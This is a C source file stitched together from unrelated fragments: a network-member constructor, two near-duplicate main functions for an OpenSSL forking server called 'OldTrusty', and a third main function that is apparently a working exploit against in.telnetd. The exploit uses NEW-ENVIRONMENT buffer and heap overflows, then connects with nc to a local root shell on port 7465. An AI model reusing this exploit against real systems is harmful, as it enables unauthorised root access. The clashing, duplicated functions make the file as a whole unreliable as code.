NetwMemb::NetwMemb(int recv_ip, int send_ip, int port, int init_role){
//Create socket, conside using this->
bind_addr.sin_family = AF_INET;
bind_addr.sin_port = htons(port);
bind_addr.sin_addr.s_addr = htonl(recv_ip);
sock_setup();
//Store sender
send_addr.sin_family = AF_INET;
send_addr.sin_port = htons(port);
send_addr.sin_addr.s_addr = htonl(send_ip);
role = init_role;
}
int main(int argc , char *argv[])
{
int sfd;
char *P_num;
SSL_CTX * ctx;
struct sockaddr_in cli_addr;
socklen_t len ;
int cli;
pid_t pid;
//Innitiliaze Server
if (checkFileStruct() == -1){
printf("Problem With OldTrusty File Structure\n");
exit(1);
}
//Initialize SSL
if (argc != 2) {
printf("Usage %s <portNUMBER> \n" , argv[0]);
exit(1);
}
P_num = argv[1]; //Set Port
ctx = InitSSL();
load_Certs(ctx, "OldTrusty/ServerCerts/mycert.pem", "OldTrusty/ServerCerts/mycert.pem"); //ALL IN ONE ?
//Get A regular tcp socket. already bound and listening.
sfd = sock_setup(P_num);
printf("OldTrusty Awaiting Connections on Port: %s\n" , P_num);
//***********************************MAIN ACCEPT LOOP STARTS HERE *****************************/
for(;;) {
//Ever ??
len = sizeof(cli_addr);
cli = accept(sfd, (struct sockaddr *)&cli_addr, &len);
if (cli == -1) {
perror("accept");
continue;
}
printf("OLDTRUSTY RECIEVED A Connection from: %s:%d\n",inet_ntoa(cli_addr.sin_addr), ntohs(cli_addr.sin_port));
SSL *ssl;
if ( ( pid = fork()) == 0 ){
//WE ARE THE CHILD
close(sfd); //Child doesnt need listner
//Layer SSL Over Client Socket
ssl = SSL_new(ctx);
SSL_set_fd(ssl, cli);
//HANDSHAKE..
if ( SSL_accept(ssl) == -1)
ERR_print_errors_fp(stderr);
//CREATE BIO OBJECT FOR THE SSL ?? TODO TO US OpenSSL over other channels (not just socketS)
//TODO
//Show Client Certs (If any) // CAN ADDif require client auth then -- check_cert(ssl,client )
//for now jsut show client certs if has any
ShowCerts(ssl);
// Here is a connection to the client
do_clients_bidding(ssl);
SSL_free(ssl);
close(cli);
exit(0); // kill child.
}
close(cli); //Parent closes connected socket (Being Handled in child)
} ///***END MAIN ACCEPT LOOP *****//
SSL_CTX_free(ctx); //release context TODO never get hear?? graceful shutdown of server?
return 0;
}
int main(int argc , char *argv[])
{
int sfd;
char *P_num;
SSL_CTX * ctx;
struct sockaddr_in cli_addr;
socklen_t len ;
int cli;
pid_t pid;
struct sigaction sa;
//Innitiliaze Server
if (checkFileStruct() == -1){
printf("Server: Problem With OldTrusty File Structure\n");
exit(1);
}
//Initialize the Vouch Structure
initVouchStruct();
//Initialize SSL
if (argc != 2) {
printf("Usage %s <portNUMBER> \n" , argv[0]);
exit(1);
}
P_num = argv[1]; //Set Port
ctx = InitSSL();
load_Certs(ctx, "OldTrusty/ServerCerts/server.crt", "OldTrusty/ServerCerts/server.key"); //ALL IN ONE ?
//Get A regular tcp socket. already bound and listening.
sfd = sock_setup(P_num);
sa.sa_handler = sigchld_handler; // reap all dead processes
sigemptyset(&sa.sa_mask);
sa.sa_flags = SA_RESTART;
if (sigaction(SIGCHLD, &sa, NULL) == -1) {
perror("sigaction");
exit(1); }
printf("Server: OldTrusty Awaiting Connections on Port: %s\n" , P_num);
//***********************************MAIN ACCEPT LOOP STARTS HERE *****************************/
for(;;) {
len = sizeof(cli_addr);
cli = accept(sfd, (struct sockaddr *)&cli_addr, &len);
if (cli == -1) {
perror("accept");
continue;
}
printf("Server: OLDTRUSTY recieved A Connection from: %s:%d\n",inet_ntoa(cli_addr.sin_addr), ntohs(cli_addr.sin_port));
SSL *ssl;
if ( ( pid = fork()) == 0 ){
//WE ARE THE CHILD
close(sfd); //Child doesnt need listner
//Layer SSL Over Client Socket
ssl = SSL_new(ctx);
SSL_set_fd(ssl, cli);
//HANDSHAKE..
if ( SSL_accept(ssl) == -1)
ERR_print_errors_fp(stderr);
//Show Client Certs (If any) // CAN ADDif require client auth then //for now jsut show client certs if has any
ShowCerts(ssl);
// Here is a connection to the client
do_clients_bidding(ssl);
SSL_free(ssl);
close(cli);
exit(0); // kill child.
}
close(cli); //Parent closes connected socket (Being Handled in child)
} ///***END MAIN ACCEPT LOOP *****//
SSL_CTX_free(ctx); //release context TODO never get hear?? graceful shutdown of server?
return 0;
}
main (int argc, char *argv[])
{
int br, l, dosleep = 0;
int percent = 0;
char spin;
unsigned char w;
bzero (oldenv, sizeof (oldenv));
argv++;
dalen = strlen ("clarity.local");
while (argv[0])
{
if (!strcmp (argv[0], "--pause"))
dosleep = 1;
if (!strcmp (argv[0], "--size") && argv[1])
{
mipl = atoi (argv[1]);
argv++;
}
if (!strcmp (argv[0], "--name") && argv[1])
{
dalen = strlen (argv[1]);
argv++;
}
argv++;
}
fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);
if(dalen%3==0)
{
offsets=offset3;
}
else
{
ninbufoffset = mipl % 8192;
offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
if (offsets[11] > 255)
{
fprintf (stderr, " ! MiPl too big.", mipl, dalen);
exit (1);
}
}
sock_setup ();
if (dosleep)
{
system ("sleep 1;ps aux|grep in.telnetd|grep -v grep");
sleep (8);
}
dalen += strlen ("\r\n[ : yes]\r\n");
fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
fflush (stderr);
doo (5);
will (39);
fflush (dasock);
read_sock ();
fprintf (stderr, "o Setting up environment vars...\n");
fflush (stderr);
will (1);
push_clean ();
doenv ("USER", "zen-parse");
doenv ("TERM", "zen-parse");
will (39);
fflush (dasock);
fprintf (stderr, "o Doing overflows...\n");
fflush (stderr);
for (br = 0; (offsets[br] || offsets[br + 1]); br += 2)
{
fill (mipl + ENV + offsets[br], offsets[br + 1]);
fflush (dasock);
usleep (100000);
read_sock ();
}
fprintf (stderr, "o Overflows done...\n");
fflush (stderr);
push_clean ();
fprintf (stderr, "o Sending IACs to start login process...\n");
fflush (stderr);
wont (24);
wont (32);
wont (35);
fprintf (dasock, "%s", tosend);
will (1);
push_heap_attack ();
sleep (1);
fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
execlp ("nc", "nc", "-v", "localhost", "7465", 0);
fprintf (stderr,
"o If the exploit worked, there should be an open port on 7465.\n");
fprintf (stderr, " It is a root shell. You should probably close it.\n");
fflush (stderr);
sleep (60);
exit (0);
}
